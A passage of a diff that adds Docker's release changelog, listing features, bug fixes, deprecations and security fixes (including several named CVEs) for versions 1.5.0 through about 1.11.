+- Fix a situation where a container cannot be stopped if the terminal is closed ([#21840](https://github.com/docker/docker/pull/21840))
+
+### Security
+
+* Object with the `pcp_pmcd_t` selinux type were given management access to `/var/lib/docker(/.*)?` ([#21370](https://github.com/docker/docker/pull/21370))
+* `restart_syscall`, `copy_file_range`, `mlock2` joined the list of allowed calls in the default seccomp profile ([#21117](https://github.com/docker/docker/pull/21117), [#21262](https://github.com/docker/docker/pull/21262))
+* `send`, `recv` and `x32` were added to the list of allowed syscalls and arch in the default seccomp profile ([#19432](https://github.com/docker/docker/pull/19432))
+* Docker Content Trust now requests the server to perform snapshot signing ([#21046](https://github.com/docker/docker/pull/21046))
+* Support for using YubiKeys for Content Trust signing has been moved out of experimental ([#21591](https://github.com/docker/docker/pull/21591))
+
+### Volumes
+
+* Output of `docker volume ls` is now sorted by volume name ([#20389](https://github.com/docker/docker/pull/20389))
+* Local volumes can now accept options similar to the unix `mount` tool ([#20262](https://github.com/docker/docker/pull/20262))
+- Fix an issue where one letter directory name could not be used as source for volumes ([#21106](https://github.com/docker/docker/pull/21106))
++ `docker run -v` now accepts a new flag `nocopy`. This tells the runtime not to copy the container path content into the volume (which is the default behavior) ([#21223](https://github.com/docker/docker/pull/21223))
+
+## 1.10.3 (2016-03-10)
+
+### Runtime
+
+- Fix Docker client exiting with an "Unrecognized input header" error [#20706](https://github.com/docker/docker/pull/20706)
+- Fix Docker exiting if Exec is started with both `AttachStdin` and `Detach` [#20647](https://github.com/docker/docker/pull/20647)
+
+### Distribution
+
+- Fix a crash when pushing multiple images sharing the same layers to the same repository in parallel [#20831](https://github.com/docker/docker/pull/20831)
+- Fix a panic when pushing images to a registry which uses a misconfigured token service [#21030](https://github.com/docker/docker/pull/21030)
+
+### Plugin system
+
+- Fix issue preventing volume plugins to start when SELinux is enabled [#20834](https://github.com/docker/docker/pull/20834)
+- Prevent Docker from exiting if a volume plugin returns a null response for Get requests [#20682](https://github.com/docker/docker/pull/20682)
+- Fix plugin system leaking file descriptors if a plugin has an error [#20680](https://github.com/docker/docker/pull/20680)
+
+### Security
+
+- Fix linux32 emulation to fail during docker build [#20672](https://github.com/docker/docker/pull/20672)
+  It was due to the `personality` syscall being blocked by the default seccomp profile.
+- Fix Oracle XE 10g failing to start in a container [#20981](https://github.com/docker/docker/pull/20981)
+  It was due to the `ipc` syscall being blocked by the default seccomp profile.
+- Fix user namespaces not working on Linux From Scratch [#20685](https://github.com/docker/docker/pull/20685)
+- Fix issue preventing daemon to start if userns is enabled and the `subuid` or `subgid` files contain comments [#20725](https://github.com/docker/docker/pull/20725)
+
+## 1.10.2 (2016-02-22)
+
+### Runtime
+
+- Prevent systemd from deleting containers' cgroups when its configuration is reloaded [#20518](https://github.com/docker/docker/pull/20518)
+- Fix SELinux issues by disregarding `--read-only` when mounting `/dev/mqueue` [#20333](https://github.com/docker/docker/pull/20333)
+- Fix chown permissions used during `docker cp` when userns is used [#20446](https://github.com/docker/docker/pull/20446)
+- Fix configuration loading issue with all booleans defaulting to `true` [#20471](https://github.com/docker/docker/pull/20471)
+- Fix occasional panic with `docker logs -f` [#20522](https://github.com/docker/docker/pull/20522)
+
+### Distribution
+
+- Keep layer reference if deletion failed to avoid a badly inconsistent state [#20513](https://github.com/docker/docker/pull/20513)
+- Handle gracefully a corner case when canceling migration [#20372](https://github.com/docker/docker/pull/20372)
+- Fix docker import on compressed data [#20367](https://github.com/docker/docker/pull/20367)
+- Fix tar-split files corruption during migration that later cause docker push and docker save to fail [#20458](https://github.com/docker/docker/pull/20458)
+
+### Networking
+
+- Fix daemon crash if embedded DNS is sent garbage [#20510](https://github.com/docker/docker/pull/20510)
+
+### Volumes
+
+- Fix issue with multiple volume references with same name [#20381](https://github.com/docker/docker/pull/20381)
+
+### Security
+
+- Fix potential cache corruption and delegation conflict issues [#20523](https://github.com/docker/docker/pull/20523)
+
+## 1.10.1 (2016-02-11)
+
+### Runtime
+
+* Do not stop daemon on migration hard failure [#20156](https://github.com/docker/docker/pull/20156)
+- Fix various issues with migration to content-addressable images [#20058](https://github.com/docker/docker/pull/20058)
+- Fix ZFS permission bug with user namespaces [#20045](https://github.com/docker/docker/pull/20045)
+- Do not leak /dev/mqueue from the host to all containers, keep it container-specific [#19876](https://github.com/docker/docker/pull/19876) [#20133](https://github.com/docker/docker/pull/20133)
+- Fix `docker ps --filter before=...` to not show stopped containers without providing `-a` flag [#20135](https://github.com/docker/docker/pull/20135)
+
+### Security
+
+- Fix issue preventing docker events to work properly with authorization plugin [#20002](https://github.com/docker/docker/pull/20002)
+
+### Distribution
+
+* Add additional verifications and prevent from uploading invalid data to registries [#20164](https://github.com/docker/docker/pull/20164)
+- Fix regression preventing uppercase characters in image reference hostname [#20175](https://github.com/docker/docker/pull/20175)
+
+### Networking
+
+- Fix embedded DNS for user-defined networks in the presence of firewalld [#20060](https://github.com/docker/docker/pull/20060)
+- Fix issue where removing a network during shutdown left Docker inoperable [#20181](https://github.com/docker/docker/issues/20181) [#20235](https://github.com/docker/docker/issues/20235)
+- Embedded DNS is now able to return compressed results [#20181](https://github.com/docker/docker/issues/20181)
+- Fix port-mapping issue with `userland-proxy=false` [#20181](https://github.com/docker/docker/issues/20181)
+
+### Logging
+
+- Fix bug where tcp+tls protocol would be rejected [#20109](https://github.com/docker/docker/pull/20109)
+
+### Volumes
+
+- Fix issue whereby older volume drivers would not receive volume options [#19983](https://github.com/docker/docker/pull/19983)
+
+### Misc
+
+- Remove TasksMax from Docker systemd service [#20167](https://github.com/docker/docker/pull/20167)
+
+## 1.10.0 (2016-02-04)
+
+**IMPORTANT**: Docker 1.10 uses a new content-addressable storage for images and layers.
+A migration is performed the first time docker is run, and can take a significant amount of time depending on the number of images present.
+Refer to this page on the wiki for more information: https://github.com/docker/docker/wiki/Engine-v1.10.0-content-addressability-migration
+We also released a cool migration utility that enables you to perform the migration before updating to reduce downtime.
+Engine 1.10 migrator can be found on Docker Hub: https://hub.docker.com/r/docker/v1.10-migrator/
+
+### Runtime
+
++ New `docker update` command that allows updating resource constraints on running containers [#15078](https://github.com/docker/docker/pull/15078)
++ Add `--tmpfs` flag to `docker run` to create a tmpfs mount in a container [#13587](https://github.com/docker/docker/pull/13587)
++ Add `--format` flag to `docker images` command [#17692](https://github.com/docker/docker/pull/17692)
++ Allow to set daemon configuration in a file and hot-reload it with the `SIGHUP` signal [#18587](https://github.com/docker/docker/pull/18587)
++ Updated docker events to include more meta-data and event types [#18888](https://github.com/docker/docker/pull/18888)
+  This change is backward compatible in the API, but not on the CLI.
++ Add `--blkio-weight-device` flag to `docker run` [#13959](https://github.com/docker/docker/pull/13959)
++ Add `--device-read-bps` and `--device-write-bps` flags to `docker run` [#14466](https://github.com/docker/docker/pull/14466)
++ Add `--device-read-iops` and `--device-write-iops` flags to `docker run` [#15879](https://github.com/docker/docker/pull/15879)
++ Add `--oom-score-adj` flag to `docker run` [#16277](https://github.com/docker/docker/pull/16277)
++ Add `--detach-keys` flag to `attach`, `run`, `start` and `exec` commands to override the default key sequence that detaches from a container  [#15666](https://github.com/docker/docker/pull/15666)
++ Add `--shm-size` flag to `run`, `create` and `build` to set the size of `/dev/shm` [#16168](https://github.com/docker/docker/pull/16168)
++ Show the number of running, stopped, and paused containers in `docker info` [#19249](https://github.com/docker/docker/pull/19249)
++ Show the `OSType` and `Architecture` in `docker info` [#17478](https://github.com/docker/docker/pull/17478)
++ Add `--cgroup-parent` flag on `daemon` to set cgroup parent for all containers [#19062](https://github.com/docker/docker/pull/19062)
++ Add `-L` flag to docker cp to follow symlinks [#16613](https://github.com/docker/docker/pull/16613)
++ New `status=dead` filter for `docker ps` [#17908](https://github.com/docker/docker/pull/17908)
+* Change `docker run` exit codes to distinguish between runtime and application errors [#14012](https://github.com/docker/docker/pull/14012)
+* Enhance `docker events --since` and `--until` to support nanoseconds and timezones [#17495](https://github.com/docker/docker/pull/17495)
+* Add `--all`/`-a` flag to `stats` to include both running and stopped containers [#16742](https://github.com/docker/docker/pull/16742)
+* Change the default cgroup-driver to `cgroupfs` [#17704](https://github.com/docker/docker/pull/17704)
+* Emit a "tag" event when tagging an image with `build -t` [#17115](https://github.com/docker/docker/pull/17115)
+* Best effort for linked containers' start order when starting the daemon [#18208](https://github.com/docker/docker/pull/18208)
+* Add ability to add multiple tags on `build` [#15780](https://github.com/docker/docker/pull/15780)
+* Permit `OPTIONS` request against any url, thus fixing issue with CORS [#19569](https://github.com/docker/docker/pull/19569)
+- Fix the `--quiet` flag on `docker build` to actually be quiet [#17428](https://github.com/docker/docker/pull/17428)
+- Fix `docker images --filter dangling=false` to now show all non-dangling images [#19326](https://github.com/docker/docker/pull/19326)
+- Fix race condition causing autorestart turning off on restart [#17629](https://github.com/docker/docker/pull/17629)
+- Recognize GPFS filesystems [#19216](https://github.com/docker/docker/pull/19216)
+- Fix obscure bug preventing to start containers [#19751](https://github.com/docker/docker/pull/19751)
+- Forbid `exec` during container restart [#19722](https://github.com/docker/docker/pull/19722)
+- devicemapper: Increasing `--storage-opt dm.basesize` will now increase the base device size on daemon restart [#19123](https://github.com/docker/docker/pull/19123)
+
+### Security
+
++ Add `--userns-remap` flag to `daemon` to support user namespaces (previously in experimental) [#19187](https://github.com/docker/docker/pull/19187)
++ Add support for custom seccomp profiles in `--security-opt` [#17989](https://github.com/docker/docker/pull/17989)
++ Add default seccomp profile [#18780](https://github.com/docker/docker/pull/18780)
++ Add `--authorization-plugin` flag to `daemon` to customize ACLs [#15365](https://github.com/docker/docker/pull/15365)
++ Docker Content Trust now supports the ability to read and write user delegations [#18887](https://github.com/docker/docker/pull/18887)
+  This is an optional, opt-in feature that requires the explicit use of the Notary command-line utility in order to be enabled.
+  Enabling delegation support in a specific repository will break the ability of Docker 1.9 and 1.8 to pull from that repository, if content trust is enabled.
+* Allow SELinux to run in a container when using the BTRFS storage driver [#16452](https://github.com/docker/docker/pull/16452)
+
+### Distribution
+
+* Use content-addressable storage for images and layers [#17924](https://github.com/docker/docker/pull/17924)
+  Note that a migration is performed the first time docker is run; it can take a significant amount of time depending on the number of images and containers present.
+  Images no longer depend on the parent chain but contain a list of layer references.
+  `docker load`/`docker save` tarballs now also contain content-addressable image configurations.
+  For more information: https://github.com/docker/docker/wiki/Engine-v1.10.0-content-addressability-migration
+* Add support for the new [manifest format ("schema2")](https://github.com/docker/distribution/blob/master/docs/spec/manifest-v2-2.md) [#18785](https://github.com/docker/docker/pull/18785)
+* Lots of improvements for push and pull: performance++, retries on failed downloads, cancelling on client disconnect [#18353](https://github.com/docker/docker/pull/18353), [#18418](https://github.com/docker/docker/pull/18418), [#19109](https://github.com/docker/docker/pull/19109), [#18353](https://github.com/docker/docker/pull/18353)
+* Limit v1 protocol fallbacks [#18590](https://github.com/docker/docker/pull/18590)
+- Fix issue where docker could hang indefinitely waiting for a nonexistent process to pull an image [#19743](https://github.com/docker/docker/pull/19743)
+
+### Networking
+
++ Use DNS-based discovery instead of `/etc/hosts` [#19198](https://github.com/docker/docker/pull/19198)
++ Support for network-scoped alias using `--net-alias` on `run` and `--alias` on `network connect` [#19242](https://github.com/docker/docker/pull/19242)
++ Add `--ip` and `--ip6` on `run` and `network connect` to support custom IP addresses for a container in a network [#19001](https://github.com/docker/docker/pull/19001)
++ Add `--ipam-opt` to `network create` for passing custom IPAM options [#17316](https://github.com/docker/docker/pull/17316)
++ Add `--internal` flag to `network create` to restrict external access to and from the network [#19276](https://github.com/docker/docker/pull/19276)
++ Add `kv.path` option to `--cluster-store-opt` [#19167](https://github.com/docker/docker/pull/19167)
++ Add `discovery.heartbeat` and `discovery.ttl` options to `--cluster-store-opt` to configure discovery TTL and heartbeat timer [#18204](https://github.com/docker/docker/pull/18204)
++ Add `--format` flag to `network inspect` [#17481](https://github.com/docker/docker/pull/17481)
++ Add `--link` to `network connect` to provide a container-local alias [#19229](https://github.com/docker/docker/pull/19229)
++ Support for Capability exchange with remote IPAM plugins [#18775](https://github.com/docker/docker/pull/18775)
++ Add `--force` to `network disconnect` to force container to be disconnected from network [#19317](https://github.com/docker/docker/pull/19317)
+* Support for multi-host networking using built-in overlay driver for all engine supported kernels: 3.10+ [#18775](https://github.com/docker/docker/pull/18775)
+* `--link` is now supported on `docker run` for containers in user-defined network [#19229](https://github.com/docker/docker/pull/19229)
+* Enhance `docker network rm` to allow removing multiple networks [#17489](https://github.com/docker/docker/pull/17489)
+* Include container names in `network inspect` [#17615](https://github.com/docker/docker/pull/17615)
+* Include auto-generated subnets for user-defined networks in `network inspect` [#17316](https://github.com/docker/docker/pull/17316)
+* Add `--filter` flag to `network ls` to hide predefined networks [#17782](https://github.com/docker/docker/pull/17782)
+* Add support for network connect/disconnect to stopped containers [#18906](https://github.com/docker/docker/pull/18906)
+* Add network ID to container inspect [#19323](https://github.com/docker/docker/pull/19323)
+- Fix MTU issue where Docker would not start with two or more default routes [#18108](https://github.com/docker/docker/pull/18108)
+- Fix duplicate IP address for containers [#18106](https://github.com/docker/docker/pull/18106)
+- Fix issue preventing sometimes docker from creating the bridge network [#19338](https://github.com/docker/docker/pull/19338)
+- Do not substitute 127.0.0.1 name server when using `--net=host` [#19573](https://github.com/docker/docker/pull/19573)
+
+### Logging
+
++ New logging driver for Splunk [#16488](https://github.com/docker/docker/pull/16488)
++ Add support for syslog over TCP+TLS [#18998](https://github.com/docker/docker/pull/18998)
+* Enhance `docker logs --since` and `--until` to support nanoseconds and time [#17495](https://github.com/docker/docker/pull/17495)
+* Enhance AWS logs to auto-detect region [#16640](https://github.com/docker/docker/pull/16640)
+
+### Volumes
+
++ Add support to set the mount propagation mode for a volume [#17034](https://github.com/docker/docker/pull/17034)
+* Add `ls` and `inspect` endpoints to volume plugin API [#16534](https://github.com/docker/docker/pull/16534)
+  Existing plugins need to make use of these new APIs to satisfy users' expectation
+  For that, please use the new MIME type `application/vnd.docker.plugins.v1.2+json` [#19549](https://github.com/docker/docker/pull/19549)
+- Fix data not being copied to named volumes [#19175](https://github.com/docker/docker/pull/19175)
+- Fix issues preventing volume drivers from being containerized [#19500](https://github.com/docker/docker/pull/19500)
+- Fix `docker volumes ls --dangling=false` to now show all non-dangling volumes [#19671](https://github.com/docker/docker/pull/19671)
+- Do not remove named volumes on container removal [#19568](https://github.com/docker/docker/pull/19568)
+- Allow external volume drivers to host anonymous volumes [#19190](https://github.com/docker/docker/pull/19190)
+
+### Builder
+
++ Add support for `**` in `.dockerignore` to wildcard multiple levels of directories [#17090](https://github.com/docker/docker/pull/17090)
+- Fix handling of UTF-8 characters in Dockerfiles [#17055](https://github.com/docker/docker/pull/17055)
+- Fix permissions problem when reading from STDIN [#19283](https://github.com/docker/docker/pull/19283)
+
+### Client
+
++ Add support for overriding the API version to use via an `DOCKER_API_VERSION` environment-variable [#15964](https://github.com/docker/docker/pull/15964)
+- Fix a bug preventing Windows clients to log in to Docker Hub [#19891](https://github.com/docker/docker/pull/19891)
+
+### Misc
+
+* systemd: Set TasksMax in addition to LimitNPROC in systemd service file [#19391](https://github.com/docker/docker/pull/19391)
+
+### Deprecations
+
+* Remove LXC support. The LXC driver was deprecated in Docker 1.8, and has now been removed [#17700](https://github.com/docker/docker/pull/17700)
+* Remove `--exec-driver` daemon flag, because it is no longer in use [#17700](https://github.com/docker/docker/pull/17700)
+* Remove old deprecated single-dashed long CLI flags (such as `-rm`; use `--rm` instead) [#17724](https://github.com/docker/docker/pull/17724)
+* Deprecate HostConfig at API container start [#17799](https://github.com/docker/docker/pull/17799)
+* Deprecate docker packages for newly EOL'd Linux distributions: Fedora 21 and Ubuntu 15.04 (Vivid) [#18794](https://github.com/docker/docker/pull/18794), [#18809](https://github.com/docker/docker/pull/18809)
+* Deprecate `-f` flag for docker tag [#18350](https://github.com/docker/docker/pull/18350)
+
+## 1.9.1 (2015-11-21)
+
+### Runtime
+
+- Do not prevent daemon from booting if images could not be restored (#17695)
+- Force IPC mount to unmount on daemon shutdown/init (#17539)
+- Turn IPC unmount errors into warnings (#17554)
+- Fix `docker stats` performance regression (#17638)
+- Clarify cryptic error message upon `docker logs` if `--log-driver=none` (#17767)
+- Fix seldom panics (#17639, #17634, #17703)
+- Fix opq whiteouts problems for files with dot prefix (#17819)
+- devicemapper: try defaulting to xfs instead of ext4 for performance reasons (#17903, #17918)
+- devicemapper: fix displayed fs in docker info (#17974)
+- selinux: only relabel if user requested so with the `z` option (#17450, #17834)
+- Do not make network calls when normalizing names (#18014)
+
+### Client
+
+- Fix `docker login` on windows (#17738)
+- Fix bug with `docker inspect` output when not connected to daemon (#17715)
+- Fix `docker inspect -f {{.HostConfig.Dns}} somecontainer` (#17680)
+
+### Builder
+
+- Fix regression with symlink behavior in ADD/COPY (#17710)
+
+### Networking
+
+- Allow passing a network ID as an argument for `--net` (#17558)
+- Fix connect to host and prevent disconnect from host for `host` network (#17476)
+- Fix `--fixed-cidr` issue when gateway ip falls in ip-range and ip-range is
+  not the first block in the network (#17853)
+- Restore deterministic `IPv6` generation from `MAC` address on default `bridge` network (#17890)
+- Allow port-mapping only for endpoints created on docker run (#17858)
+- Fixed an endpoint delete issue with a possible stale sbox (#18102)
+
+### Distribution
+
+- Correct parent chain in v2 push when v1Compatibility files on the disk are inconsistent (#18047)
+
+## 1.9.0 (2015-11-03)
+
+### Runtime
+
++ `docker stats` now returns block IO metrics (#15005)
++ `docker stats` now details network stats per interface (#15786)
++ Add `ancestor=<image>` filter to `docker ps --filter` flag to filter
+containers based on their ancestor images (#14570)
++ Add `label=<somelabel>` filter to `docker ps --filter` to filter containers
+based on label (#16530)
++ Add `--kernel-memory` flag to `docker run` (#14006)
++ Add `--message` flag to `docker import` allowing to specify an optional
+message (#15711)
++ Add `--privileged` flag to `docker exec` (#14113)
++ Add `--stop-signal` flag to `docker run` allowing to replace the container
+process stopping signal (#15307)
++ Add a new `unless-stopped` restart policy (#15348)
++ Inspecting an image now returns tags (#13185)
++ Add container size information to `docker inspect` (#15796)
++ Add `RepoTags` and `RepoDigests` field to `/images/{name:.*}/json` (#17275)
+- Remove the deprecated `/container/ps` endpoint from the API (#15972)
+- Send and document correct HTTP codes for `/exec/<name>/start` (#16250)
+- Share shm and mqueue between containers sharing IPC namespace (#15862)
+- Event stream now shows OOM status when `--oom-kill-disable` is set (#16235)
+- Ensure special network files (/etc/hosts etc.) are read-only if bind-mounted
+with `ro` option (#14965)
+- Improve `rmi` performance (#16890)
+- Do not update /etc/hosts for the default bridge network, except for links (#17325)
+- Fix conflict with duplicate container names (#17389)
+- Fix an issue with incorrect template execution in `docker inspect` (#17284)
+- DEPRECATE `-c` short flag variant for `--cpu-shares` in docker run (#16271)
+
+### Client
+
++ Allow `docker import` to import from local files (#11907)
+
+### Builder
+
++ Add a `STOPSIGNAL` Dockerfile instruction allowing to set a different
+stop-signal for the container process (#15307)
++ Add an `ARG` Dockerfile instruction and a `--build-arg` flag to `docker build`
+that allows to add build-time environment variables (#15182)
+- Improve cache miss performance (#16890)
+
+### Storage
+
+- devicemapper: Implement deferred deletion capability (#16381)
+
+## Networking
+
++ `docker network` exits experimental and is part of standard release (#16645)
++ New network top-level concept, with associated subcommands and API (#16645)
+  WARNING: the API is different from the experimental API
++ Support for multiple isolated/micro-segmented networks (#16645)
++ Built-in multihost networking using VXLAN based overlay driver (#14071)
++ Support for third-party network plugins (#13424)
++ Ability to dynamically connect containers to multiple networks (#16645)
++ Support for user-defined IP address management via pluggable IPAM drivers (#16910)
++ Add daemon flags `--cluster-store` and `--cluster-advertise` for built-in nodes discovery (#16229)
++ Add `--cluster-store-opt` for setting up TLS settings (#16644)
++ Add `--dns-opt` to the daemon (#16031)
+- DEPRECATE following container `NetworkSettings` fields in API v1.21: `EndpointID`, `Gateway`,
+  `GlobalIPv6Address`, `GlobalIPv6PrefixLen`, `IPAddress`, `IPPrefixLen`, `IPv6Gateway` and `MacAddress`.
+  Those are now specific to the `bridge` network. Use `NetworkSettings.Networks` to inspect
+  the networking settings of a container per network.
+
+### Volumes
+
++ New top-level `volume` subcommand and API (#14242)
+- Move API volume driver settings to host-specific config (#15798)
+- Print an error message if volume name is not unique (#16009)
+- Ensure volumes created from Dockerfiles always use the local volume driver
+(#15507)
+- DEPRECATE auto-creating missing host paths for bind mounts (#16349)
+
+### Logging
+
++ Add `awslogs` logging driver for Amazon CloudWatch (#15495)
++ Add generic `tag` log option to allow customizing container/image
+information passed to driver (e.g. show container names) (#15384)
+- Implement the `docker logs` endpoint for the journald driver (#13707)
+- DEPRECATE driver-specific log tags (e.g. `syslog-tag`, etc.) (#15384)
+
+### Distribution
+
++ `docker search` now works with partial names (#16509)
+- Push optimization: avoid buffering to file (#15493)
+- The daemon will display progress for images that were already being pulled
+by another client (#15489)
+- Only permissions required for the current action being performed are requested (#)
++ Renaming trust keys (and respective environment variables) from `offline` to
+`root` and `tagging` to `repository` (#16894)
+- DEPRECATE trust key environment variables
+`DOCKER_CONTENT_TRUST_OFFLINE_PASSPHRASE` and
+`DOCKER_CONTENT_TRUST_TAGGING_PASSPHRASE` (#16894)
+
+### Security
+
++ Add SELinux profiles to the rpm package (#15832)
+- Fix various issues with AppArmor profiles provided in the deb package
+(#14609)
+- Add AppArmor policy that prevents writing to /proc (#15571)
+
+## 1.8.3 (2015-10-12)
+
+### Distribution
+
+- Fix layer IDs lead to local graph poisoning (CVE-2014-8178)
+- Fix manifest validation and parsing logic errors allow pull-by-digest validation bypass (CVE-2014-8179)
++ Add `--disable-legacy-registry` to prevent a daemon from using a v1 registry
+
+## 1.8.2 (2015-09-10)
+
+### Distribution
+
+- Fixes rare edge case of handling GNU LongLink and LongName entries.
+- Fix ^C on docker pull.
+- Fix docker pull issues on client disconnection.
+- Fix issue that caused the daemon to panic when loggers weren't configured properly.
+- Fix goroutine leak pulling images from registry V2.
+
+### Runtime
+
+- Fix a bug mounting cgroups for docker daemons running inside docker containers.
+- Initialize log configuration properly.
+
+### Client:
+
+- Handle `-q` flag in `docker ps` properly when there is a default format.
+
+### Networking
+
+- Fix several corner cases with netlink.
+
+### Contrib
+
+- Fix several issues with bash completion.
+
+## 1.8.1 (2015-08-12)
+
+### Distribution
+
+* Fix a bug where pushing multiple tags would result in invalid images
+
+## 1.8.0 (2015-08-11)
+
+### Distribution
+
++ Trusted pull, push and build, disabled by default
+* Make tar layers deterministic between registries
+* Don't allow deleting the image of running containers
+* Check if a tag name to load is a valid digest
+* Allow one character repository names
+* Add a more accurate error description for invalid tag name
+* Make build cache ignore mtime
+
+### Cli
+
++ Add support for DOCKER_CONFIG/--config to specify config file dir
++ Add --type flag  for docker inspect command
++ Add formatting options to `docker ps` with `--format`
++ Replace `docker -d` with new subcommand `docker daemon`
+* Zsh completion updates and improvements
+* Add some missing events to bash completion
+* Support daemon urls with base paths in `docker -H`
+* Validate status= filter to docker ps
+* Display when a container is in --net=host in docker ps
+* Extend docker inspect to export image metadata related to graph driver
+* Restore --default-gateway{,-v6} daemon options
+* Add missing unpublished ports in docker ps
+* Allow duration strings in `docker events` as --since/--until
+* Expose more mounts information in `docker inspect`
+
+### Runtime
+
++ Add new Fluentd logging driver
++ Allow `docker import` to load from local files
++ Add logging driver for GELF via UDP
++ Allow to copy files from host to containers with `docker cp`
++ Promote volume drivers from experimental to master
++ Add rollover options to json-file log driver, and --log-driver-opts flag
++ Add memory swappiness tuning options
+* Remove cgroup read-only flag when privileged
+* Make /proc, /sys, & /dev readonly for readonly containers
+* Add cgroup bind mount by default
+* Overlay: Export metadata for container and image in `docker inspect`
+* Devicemapper: external device activation
+* Devicemapper: Compare uuid of base device on startup
+* Remove RC4 from the list of registry cipher suites
+* Add syslog-facility option
+* LXC execdriver compatibility with recent LXC versions
+* Mark LXC execriver as deprecated (to be removed with the migration to runc)
+
+### Plugins
+
+* Separate plugin sockets and specs locations
+* Allow TLS connections to plugins
+
+### Bug fixes
+
+- Add missing 'Names' field to /containers/json API output
+- Make `docker rmi` of dangling images safe while pulling
+- Devicemapper: Change default basesize to 100G
+- Go Scheduler issue with sync.Mutex and gcc
+- Fix issue where Search API endpoint would panic due to empty AuthConfig
+- Set image canonical names correctly
+- Check dockerinit only if lxc driver is used
+- Fix ulimit usage of nproc
+- Always attach STDIN if -i,--interactive is specified
+- Show error messages when saving container state fails
+- Fixed incorrect assumption on --bridge=none treated as disable network
+- Check for invalid port specifications in host configuration
+- Fix endpoint leave failure for --net=host mode
+- Fix goroutine leak in the stats API if the container is not running
+- Check for apparmor file before reading it
+- Fix DOCKER_TLS_VERIFY being ignored
+- Set umask to the default on startup
+- Correct the message of pause and unpause a non-running container
+- Adjust disallowed CpuShares in container creation
+- ZFS: correctly apply selinux context
+- Display empty string instead of <nil> when IP opt is nil
+- `docker kill` returns error when container is not running
+- Fix COPY/ADD quoted/json form
+- Fix goroutine leak on logs -f with no output
+- Remove panic in nat package on invalid hostport
+- Fix container linking in Fedora 22
+- Fix error caused using default gateways outside of the allocated range
+- Format times in inspect command with a template as RFC3339Nano
+- Make registry client to accept 2xx and 3xx http status responses as successful
+- Fix race issue that caused the daemon to crash with certain layer downloads failed in a specific order.
+- Fix error when the docker ps format was not valid.
+- Remove redundant ip forward check.
+- Fix issue trying to push images to repository mirrors.
+- Fix error cleaning up network entrypoints when there is an initialization issue.
+
+## 1.7.1 (2015-07-14)
+
+#### Runtime
+
+- Fix default user spawning exec process with `docker exec`
+- Make `--bridge=none` not to configure the network bridge
+- Publish networking stats properly
+- Fix implicit devicemapper selection with static binaries
+- Fix socket connections that hung intermittently
+- Fix bridge interface creation on CentOS/RHEL 6.6
+- Fix local dns lookups added to resolv.conf
+- Fix copy command mounting volumes
+- Fix read/write privileges in volumes mounted with --volumes-from
+
+#### Remote API
+
+- Fix unmarshalling of Command and Entrypoint
+- Set limit for minimum client version supported
+- Validate port specification
+- Return proper errors when attach/reattach fail
+
+#### Distribution
+
+- Fix pulling private images
+- Fix fallback between registry V2 and V1
+
+## 1.7.0 (2015-06-16)
+
+#### Runtime
++ Experimental feature: support for out-of-process volume plugins
+* The userland proxy can be disabled in favor of hairpin NAT using the daemon’s `--userland-proxy=false` flag
+* The `exec` command supports the `-u|--user` flag to specify the new process owner
++ Default gateway for containers can be specified daemon-wide using the `--default-gateway` and `--default-gateway-v6` flags
++ The CPU CFS (Completely Fair Scheduler) quota can be set in `docker run` using `--cpu-quota`
++ Container block IO can be controlled in `docker run` using`--blkio-weight`
++ ZFS support
++ The `docker logs` command supports a `--since` argument
++ UTS namespace can be shared with the host with `docker run --uts=host`
+
+#### Quality
+* Networking stack was entirely rewritten as part of the libnetwork effort
+* Engine internals refactoring
+* Volumes code was entirely rewritten to support the plugins effort
++ Sending SIGUSR1 to a daemon will dump all goroutines stacks without exiting
+
+#### Build
++ Support ${variable:-value} and ${variable:+value} syntax for environment variables
++ Support resource management flags `--cgroup-parent`, `--cpu-period`, `--cpu-quota`, `--cpuset-cpus`, `--cpuset-mems`
++ git context changes with branches and directories
+* The .dockerignore file support exclusion rules
+
+#### Distribution
++ Client support for v2 mirroring support for the official registry
+
+#### Bugfixes
+* Firewalld is now supported and will automatically be used when available
+* mounting --device recursively
+
+## 1.6.2 (2015-05-13)
+
+####  Runtime
+- Revert change prohibiting mounting into /sys
+
+## 1.6.1 (2015-05-07)
+
+####  Security
+- Fix read/write /proc paths (CVE-2015-3630)
+- Prohibit VOLUME /proc and VOLUME / (CVE-2015-3631)
+- Fix opening of file-descriptor 1 (CVE-2015-3627)
+- Fix symlink traversal on container respawn allowing local privilege escalation (CVE-2015-3629)
+- Prohibit mount of /sys
+
+#### Runtime
+- Update AppArmor policy to not allow mounts
+
+## 1.6.0 (2015-04-07)
+
+#### Builder
++ Building images from an image ID
++ Build containers with resource constraints, ie `docker build --cpu-shares=100 --memory=1024m...`
++ `commit --change` to apply specified Dockerfile instructions while committing the image
++ `import --change` to apply specified Dockerfile instructions while importing the image
++ Builds no longer continue in the background when canceled with CTRL-C
+
+#### Client
++ Windows Support
+
+#### Runtime
++ Container and image Labels
++ `--cgroup-parent` for specifying a parent cgroup to place container cgroup within
++ Logging drivers, `json-file`, `syslog`, or `none`
++ Pulling images by ID
++ `--ulimit` to set the ulimit on a container
++ `--default-ulimit` option on the daemon which applies to all created containers (and overwritten by `--ulimit` on run)
+
+## 1.5.0 (2015-02-10)
+
+#### Builder
++ Dockerfile to use for a given `docker build` can be specified with the `-f` flag
+* Dockerfile and .dockerignore files can be themselves excluded as part of the .dockerignore file, thus preventing modifications to these files invalidating ADD or COPY instructions cache
+* ADD and COPY instructions accept relative paths
+* Dockerfile `FROM scratch` instruction is now interpreted as a no-base specifier
+* Improve performance when exposing a large number of ports
+
+#### Hack
++ Allow client-side only integration tests for Windows
+* Include docker-py integration tests against Docker daemon as part of our test suites
+
+#### Packaging
++ Support for the new version of the registry HTTP API
+* Speed up `docker push` for images with a majority of already existing layers
+- Fixed contacting a private registry through a proxy
+
+#### Remote API
++ A new endpoint will stream live container resource metrics and can be accessed with the `docker stats` command
++ Containers can be renamed using the new `rename` endpoint and the associated `docker rename` command
+* Container `inspect` endpoint show the ID of `exec` commands running in this container
+* Container `inspect` endpoint show the number of times Docker auto-restarted the container
+* New types of event can be streamed by the `events` endpoint: ‘OOM’ (container died with out of memory), ‘exec_create’, and ‘exec_start'
+- Fixed returned string fields which hold numeric characters incorrectly omitting surrounding double quotes
+
+#### Runtime
++ Docker daemon has full IPv6 support
++ The `docker run` command can take the `--pid=host` flag to use the host PID namespace, which makes it possible for example to debug host processes using containerized debugging tools
++ The `docker run` command can take the `--read-only` flag to make the container’s root filesystem mounted as readonly, which can be used in combination with volumes to force a container’s processes to only write to locations that will be persisted
++ Container total memory usage can be limited for `docker run` using the `--memory-swap` flag
+* Major stability improvements for devicemapper storage driver
